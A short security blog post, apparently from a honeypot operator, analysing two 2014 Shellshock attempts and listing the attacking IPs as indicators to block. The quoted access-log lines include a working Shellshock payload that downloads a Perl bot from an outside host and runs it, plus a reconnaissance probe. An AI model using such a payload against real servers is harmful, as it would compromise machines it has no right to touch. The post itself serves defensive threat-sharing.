ShellShock Part 2

I was able to track down yet another 2 alerts from my Honey Pot today.

# tail /var/log/nginx/access.log

29-09-2014 07:43:08,67.227.0.73,() { :;}; /bin/bash -c “wget -P /var/tmp

174.143.240.43/…/x ; perl /var/tmp/x”,

29-09-2014 09:30:11,54.251.83.67,() { :;}; /bin/bash -c “echo

testing9123123″; /bin/uname -a,

The second alert sounds interesting wherein the IP (54.251.83.67) belongs to Amazon Web Services in Singapore. This IP is possibly compromised (I leave that part to amazon who has to confirm) or is being used for Malicious activity. Though Virus total has no significant results yet, there was 1 malicious activity that has been identified.

Link!

We have noticed that this particular IP is scanning most of the Organisations, Companies and private/personal blogs to see if there are any vulnerabilities. Be on alert to see this IP (54.251.83.67) if it hits your Network. Block them immediately.

Next, lets talk about the first one.

IP 174.143.240.43 belongs to RackSpace hosting. It uses a directory traversal method to pick up base64 encoded perl file and execute it in the vulnerable machine. The perl file is a Perl Bot.

# curl -I http://174.143.240.43/…/x

HTTP/1.1 200 OK

Date: Mon, 29 Sep 2014 06:15:28 GMT

Server: Apache/2.2.9 (Debian)

Last-Modified: Sat, 27 Sep 2014 21:46:13 GMT

ETag: “340b1a-1b4dc-50412f6609340”

Accept-Ranges: bytes

Content-Length: 111836

Content-Type: text/plain

# curl -I http://174.143.240.43/

HTTP/1.1 200 OK

Date: Mon, 29 Sep 2014 06:15:33 GMT

Server: Apache/2.2.9 (Debian)

Last-Modified: Tue, 06 Jul 2010 13:09:57 GMT

ETag: “33991a-2d-48ab7c5155340”

Accept-Ranges: bytes

Content-Length: 45

Vary: Accept-Encoding

Content-Type: text/html

VirusTotal Results

New Indicators

  • 54.251.83.67
  • 174.143.240.43

Block these @ bay. Most of the Firewalls are already doing so. However, it will be interesting to see if there are any internal network communications happening to these IP’s.